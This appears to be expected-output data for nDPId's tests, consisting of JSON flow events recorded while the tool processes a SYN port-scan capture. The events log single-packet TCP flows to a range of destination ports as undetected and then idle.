+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 